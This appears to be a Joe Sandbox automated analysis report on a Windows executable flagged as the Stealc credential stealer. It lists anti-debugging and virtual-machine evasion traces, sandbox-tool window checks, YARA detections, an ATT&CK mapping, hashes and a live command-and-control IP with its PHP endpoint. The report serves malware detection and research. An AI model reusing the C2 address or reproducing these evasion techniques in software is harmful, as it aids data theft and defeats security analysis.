                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57AC3 second address: A57AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A593EA second address: A593EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9D3 second address: 93E9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F7CC8D8AE33h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9EE second address: 93E9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7CC902C406h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE2B second address: A5BE35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7CC8D8AE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE35 second address: A5BE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BE3A second address: A5BE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7CC8D8AE26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jmp 00007F7CC8D8AE38h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C179 second address: A5C180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C180 second address: A5C18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C18E second address: A5C1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC902C415h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C4CB second address: A5C4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D6F4 second address: A5D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F7CC902C406h 0x0000000c jl 00007F7CC902C406h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D707 second address: A5D712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F7CC8D8AE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D712 second address: A5D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E02 second address: A60E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979743 second address: 979764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F7CC902C408h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jp 00007F7CC902C40Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7C1962 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7BF10E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 97569B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A0239D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00574910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0056DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0056E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00574570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0056ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0056BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00573EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00573EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00561160 GetSystemInfo,ExitProcess,0_2_00561160
                Source: file.exe, file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1777021191.0000000000E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13598
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13620
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13612
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005645C0 VirtualProtect ?,00000004,00000100,000000000_2_005645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00579860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579750 mov eax, dword ptr fs:[00000030h]0_2_00579750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00577850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00577850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00579600
                Source: file.exe, file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00577B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00576920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00576920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00577850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00577850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00577A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00577A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.560000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.560000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php-file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php/file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/Xfile.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpUfile.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/wsfile.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1525249
                          Start date and time:2024-10-03 23:40:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 86
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded IPs from analysis (whitelisted): 172.202.163.200
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          Setup.exeGet hashmaliciousRedLineBrowse
                          • 185.215.113.22
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.950513255384338
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'862'144 bytes
                          MD5:622f9f481586d5dca1356051e20c13fa
                          SHA1:4e56e103cdb596ddad6076de8132d9839abd0b3d
                          SHA256:75e9d83e734f70de74b22032c01c7adee9bc2b0244ab7506bc59c5adc27d81a6
                          SHA512:52b3dbee0cba1207b3698ebfb01c454f246b455f6f05d376dae0d987005f378d65ecc5e7ce744ec8810c27123ec107a064acfabce5dea01e723b2f4053cb7c03
                          SSDEEP:24576:TTXLRC8M7zGSJ4quoGdAgo1nwoHkMmbey+qwrfy3CPP2VudSDrdqbp9PdA6+ttne:/FCU84quoYhumDzwXnWZya6GtnZajb
                          TLSH:1F8533C94C6A355CC3925A72A361E344ACDB22ACB2B1F6F1FC9D5874003D23C5B5DA67
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xaac000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F7CC888EE1Ah
                          cmovs ebx, dword ptr [eax+eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F7CC8890E15h
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
